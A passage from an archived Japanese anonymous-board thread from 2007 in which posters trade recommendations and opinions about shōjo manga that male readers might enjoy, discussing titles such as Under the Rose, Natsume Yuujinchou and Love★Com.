父の教育も紅い羽音も。俊夫もけっこう流血してるし、
のどかなイナバですら流血シーンがある。

102 :花と名無しさん:2007/10/29(月) 19:37:07 ID:???0
流血ネタしつこいね。

103 :花と名無しさん:2007/10/29(月) 20:05:28 ID:???0
破瓜ものならいっぱいあるんじゃない

104 :花と名無しさん:2007/10/29(月) 20:17:15 ID:???0
バトルシーンのあるBL漫画はよく流血する
だからといって男に人気は出ない

105 :花と名無しさん:2007/10/29(月) 20:58:47 ID:???0
>>102
自爆は男のロマン

106 :花と名無しさん:2007/10/29(月) 23:26:01 ID:???0
橘裕の「Honey」があげられていないのにびっくりだ。
主人公は童顔小柄巨乳天然料理上手の女子高生の制服が似合うような保険医。
過去にキスをした男はいるが、処女。

107 :花と名無しさん:2007/10/29(月) 23:28:55 ID:???0
橘裕なつかしい
そういえば昔「もしかしてヴァンプ」とか読んだ
たしかに男性向けっぽいね

108 :花と名無しさん:2007/10/29(月) 23:30:19 ID:???0
>>106
ちぃちゃんは「青少年恋愛新法」のちぃちゃんの方が良かったので却下。

109 :花と名無しさん:2007/10/30(火) 00:39:09 ID:6LWSMDPM0
お前ら絶対『小川とゆかいな斉藤たち』を読め

110 :花と名無しさん:2007/10/30(火) 01:07:26 ID:???0
>>86
亀だが、そこに
和田慎二「超少女明日香」「ふたりの明日香」や
柴田昌弘「紅い牙」初期3作をマーガ版コミクスで
リアルに読んでいたら、もっとネ申w

111 :花と名無しさん:2007/10/30(火) 01:45:40 ID:???0
TONOのラビットハンティグを読んで男って最低とか思った

112 :花と名無しさん:2007/10/30(火) 06:04:14 ID:???0
TONOって男なの?

113 :花と名無しさん:2007/10/30(火) 06:24:49 ID:???0
違う

114 :花と名無しさん:2007/10/30(火) 07:07:48 ID:???0
>>111
ノンフィクションじゃないんだから、最低なのは描いた作者だろ

115 :花と名無しさん:2007/10/30(火) 10:22:07 ID:???0
何でそうなる?

116 :花と名無しさん:2007/10/30(火) 14:16:41 ID:???0
>>110
ノシ

117 :花と名無しさん:2007/10/31(水) 10:41:30 ID:???0
TONOは猫エッセイがいい
特にゴロンタが・・・(っω-`。)

118 :花と名無しさん:2007/10/31(水) 17:20:40 ID:4Hr4fKJHO
金色のコルダってどう?買おうか迷ってるんだけど。
スレ違いならスマソ

119 :花と名無しさん:2007/10/31(水) 17:26:44 ID:???O
糞だよ
読む価値無し

120 :花と名無しさん:2007/10/31(水) 18:09:32 ID:???0
>>119
>>118じゃないけど、もうすこし詳しいコメントがほしいよな
ただ「糞」とか「神」だけでは、あまり情報として意味がないので

121 :花と名無しさん:2007/10/31(水) 19:36:44 ID:???0
読んでないけど良い評判聞かないなあ
乙女ゲーのコミカライズだし
絵が綺麗なだけって意見があちこちで聞かれる

122 :花と名無しさん:2007/10/31(水) 19:37:14 ID:???0
日出処の天子の、後半はともかく前半は面白いだろ
後半が萎える香具師がいてもしょうがないと思う


123 :花と名無しさん:2007/10/31(水) 19:40:10 ID:???O
118です。
皆さんいろいろレスありがとうございます。もう少し考えてみます。

124 :花と名無しさん:2007/10/31(水) 20:16:00 ID:???0
誤爆?

125 :花と名無しさん:2007/10/31(水) 20:55:38 ID:???O
>>123
ここで聞いたらどうかな。

http://same.u.la/test/r.so/anime2.2ch.net/gcomic/1168699106/l10n

126 :花と名無しさん:2007/11/02(金) 20:04:23 ID:???0
前情報仕入れてなかったから、ジャンプスクエアに神尾葉子がいるのに驚いた。
ターゲットが今ひとつ分からない雑誌だが、今後に期待したい。

127 :花と名無しさん:2007/11/03(土) 07:32:48 ID:???0
読んだ事のない人には
山岸涼子を読ましておけば間違いはないと思うのだが。

128 :花と名無しさん:2007/11/03(土) 21:13:17 ID:???0
×山岸涼子 ○山岸凉子

129 :花と名無しさん:2007/11/04(日) 09:12:12 ID:???0
△山岸ン京子

130 :花と名無しさん:2007/11/04(日) 21:25:10 ID:???O
>>126
なんか浮いてるよね…別に良いんだけど

白泉社系で、斎藤けん先生の花の名前 桑田乃梨子先生の男の花園
お薦めです。ほのぼのギャグパートが特に
桑田先生はコミックGUMで連載した豪放ライラックも面白かったです

131 :花と名無しさん:2007/11/04(日) 23:10:16 ID:???0
花の名前はなぁ…最初の2巻で終わらせとけばいいのに/展開が速すぎ
って意見をここでいくつも見たな。俺も同意見

132 :花と名無しさん:2007/11/06(火) 16:14:29 ID:???0
>>118
金色のコルダのアニメの主人公とその友達キャラクターは
乙女ゲー原作の割には男に人気はあるよ。

とりあえず、普通科のくせにエロい体しやがって
で検索すればいいと思う

133 :花と名無しさん:2007/11/07(水) 10:54:49 ID:???0
自分の意に沿わぬ作品が挙がる度に
愚痴る輩の中の人は同じなんだろか

134 :花と名無しさん:2007/11/07(水) 11:32:08 ID:???0
>>132
そう言えば、エロ萌え絵が転がっているな。

135 :うらららぁ〜:2007/11/07(水) 12:44:38 ID:8koYcwOR0
よかったら見にきて下さい!!
http://p-o-q.jp/link/#top

136 :花と名無しさん:2007/11/09(金) 21:19:40 ID:???0
ジャンプSQの神尾のプロレス漫画、結構面白かったな
ホント、場違いでジャンプで連載する意味がワカランw
神尾以外の漫画には興味が湧かなかったんで、立ち読み決定
神尾ファンの女子は、ジャンプ買ってまで読まないだろな

137 :花と名無しさん:2007/11/13(火) 04:31:07 ID:???O
「ラブ★コン」・・・面白かった。実は、以前1巻だけ読んだことはあったがつまらなかったので放置してた。
今日、全巻読んで、なんで以前よまなかったのかと不思議なくらい、最高に面白かった。
久々に漫画読んで声出してワラタし。「マジハンパない電話だゼ」の着信音とか。。。
ギャグ漫画だとしても、恋愛ものとしても面白かったです。
あとは、背の低い男にも希望を与える素晴らしい作品でした。

138 :花と名無しさん:2007/11/14(水) 00:57:09 ID:???0
「Under the Rose アンダー ザ ローズ」船戸明里

緻密な構成、優れた演出力、卓越した画力、
どれをとっても稀有な水準と言っていいのでは。
舞台・時代がカブる「エマ」に比して知名度・売上とも著しく低いが、
キャラ萌え度w以外は同等以上に評価されてしかるべき作品。

139 :花と名無しさん:2007/11/14(水) 01:02:10 ID:???0
自分はラブ★コンはいくらなんでもキャラが浅すぎてついていけなかった
心理描写の演出が多い漫画なのに、あそこまでキャラが薄いのは厳しい
どうせならもっと完全にギャグ漫画っぽければいいんだけど

140 :花と名無しさん:2007/11/16(金) 04:15:06 ID:???0
>>138
禿同。キャラもちゃんと立ってるし。
エマ好きながらもうまくいき杉臭を感じてた向きにはさらにオススメ

141 :花と名無しさん:2007/11/17(土) 23:10:43 ID:???0
キャットストリート既刊読了。
なかなか良かった。
名作!って程じゃないけど普通に良作。
ダラダラ長編作品が苦手なんで8巻で完結というのもポイント高し。
ただ7巻で終わってた方が良いんじゃないか?という気がしてる。

あとアルコの新連載が始まってたので
別マ購入(ビームとジャンプSQも一緒に買った俺は結構異端)
んー初回ヤスケンと比べると大分薄く中途半端な印象…
あと君に届けはぼちぼち締めて欲しい

142 :花と名無しさん:2007/11/18(日) 23:36:57 ID:???0
弟が2人いるんだけど、緑川ゆきの「夏目友人帳」にそろってハマった。

143 :花と名無しさん:2007/11/19(月) 00:47:02 ID:???0
夏目友人帳は昔の良かった頃の白泉社っぽい雰囲気がする漫画だな

144 :花と名無しさん:2007/11/20(火) 21:50:02 ID:???0
>>138
>>140
エマでもあまりキャラ萌えできなかったんだが
>>138の評がかなり気になるので読んでみたくなった
全然知らない作者の漫画読むの久しぶりだ
楽しみが増えたよ ありがとう


145 :花と名無しさん:2007/11/20(火) 21:57:37 ID:???0
エマ、放浪息子、竹本泉の連作
コミックビーム乙女部門のクオリティの高さと紙面での浮きっぷりは異常

146 :花と名無しさん:2007/11/20(火) 22:02:37 ID:???0
>>144
ちょっとまったー!

船戸明里は稀有な才人だし、どの作品も面白いけど、
「Under the Rose アンダー ザ ローズ」は、コミックの最新刊までは結構な欝展開だぞ〜

147 :花と名無しさん:2007/11/20(火) 22:58:22 ID:???0
>>145
須藤真澄は?

148 :花と名無しさん:2007/11/20(火) 23:43:49 ID:???0
>147
あ、忘れてたw
でもおさんぽ終了以来どうもパッとしない印象…

149 :花と名無しさん:2007/11/21(水) 03:13:45 ID:???0
日記もの読みてーなー、とも思うけど庭先の作風はやっぱいいものでありますよ

150 :花と名無しさん:2007/11/21(水) 12:22:02 ID:???0
>>146
>>144だが それはEDENやなるたる並の鬱か?
そこそこメインに食い込む女子供キャラが犯されながらナイフで刺されたり
下半身がふっとんでグロく死んだりされると流石に厳しいが
人間関係の泥沼化が理由とかの鬱展開なら昼ドラ的安っぽさがなければ許容できると思う



151 :花と名無しさん:2007/11/21(水) 18:40:01 ID:???0
>>136
そこそこ楽しめそうな感じだったな
ただジャンプに移る意味が本当にサッパリわからんなw

152 :花と名無しさん:2007/11/21(水) 22:24:18 ID:???0
>>150

なるたるとは違うほうの鬱
というか昼ドラだなw
それが平気なら大丈夫

153 :花と名無しさん:2007/11/21(水) 22:44:02 ID:???0
そうそう、ヴィクトリアン昼ドラ。
あるいは英国貴族版渡鬼w
ハマると病みつきになる

154 :花と名無しさん:2007/11/22(木) 19:10:05 ID:???O
19日に発売された岩館真理子さんの「見上げてごらん」面白かった。
ほのぼの、しんみり、笑いどころも沢山。作家スレでも概ね高評価。

155 :花と名無しさん:2007/11/23(金) 00:46:52 ID:???0
「見上げてごらん」
どっかで読んだ記憶が・・・
リメイク作品じゃないよね?

156 :花と名無しさん:2007/11/23(金) 01:14:58 ID:???0
坂本九じゃね?

157 :花と名無しさん:2007/11/27(火) 03:24:37 ID:???0
イケメンよりロマンスが足りないわ。
サイキちゃんはかわいいけど妹だしねえ。

158 :花と名無しさん:2007/11/27(火) 03:42:40 ID:???0
誤爆した。

ぼくの地球を守って
BANANA FISH
CIPHIR

あたりが好きなんですが、こんな自分にお勧めの少女マンガってありますか?
恋愛要素はあっても主ではなく従な感じで、ストーリー重視の漫画が好みです。
一応上記の作者の漫画は目を通してます。

159 :花と名無しさん:2007/11/27(火) 03:59:27 ID:???0
>>158
グランローヴァ物語
彼方から
プラネットラダー
冥のほとり
薬師アルジャン

ファンタジー系で選んでみた。
下二つは連載中。

160 :花と名無しさん:2007/11/27(火) 05:09:29 ID:???0
成田山住人の男か、ネカマか悩むなw

161 :花と名無しさん:2007/11/29(木) 00:30:59 ID:???0
東京babylon

162 :花と名無しさん:2007/11/29(木) 00:35:37 ID:???0
(´;ω;`)北都ちゃん…

163 :花と名無しさん:2007/11/29(木) 00:40:07 ID:???0
>>154
岩館真理子の本を買うのはこれが初めてだけど、これは良かったなぁ。
YOUで間の1話だけ読んで面白かったから、コミックスになるのを待ってた甲斐があった。
俺もかなりの数の少女漫画を読んだけど、なぜか岩館には縁が無かったんだよな。

164 :花と名無しさん:2007/11/29(木) 14:43:36 ID:???0
>>163
めちゃくちゃ「上手い」人だから、これからあたってみてくれ〜
「キララのキ」なんかどうか

165 :花と名無しさん:2007/12/02(日) 20:37:34 ID:6hlT/M2b0
カレカノ読んでる人多いよね

166 :花と名無しさん:2007/12/03(月) 02:29:11 ID:u7jBD8LEO
赤ずきんチャチャ。漫画おもろかった

167 :花と名無しさん:2007/12/03(月) 02:40:00 ID:???O
なかじ有紀 は基本的に男も読める。
ただどの作品もなんか同じ

44 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)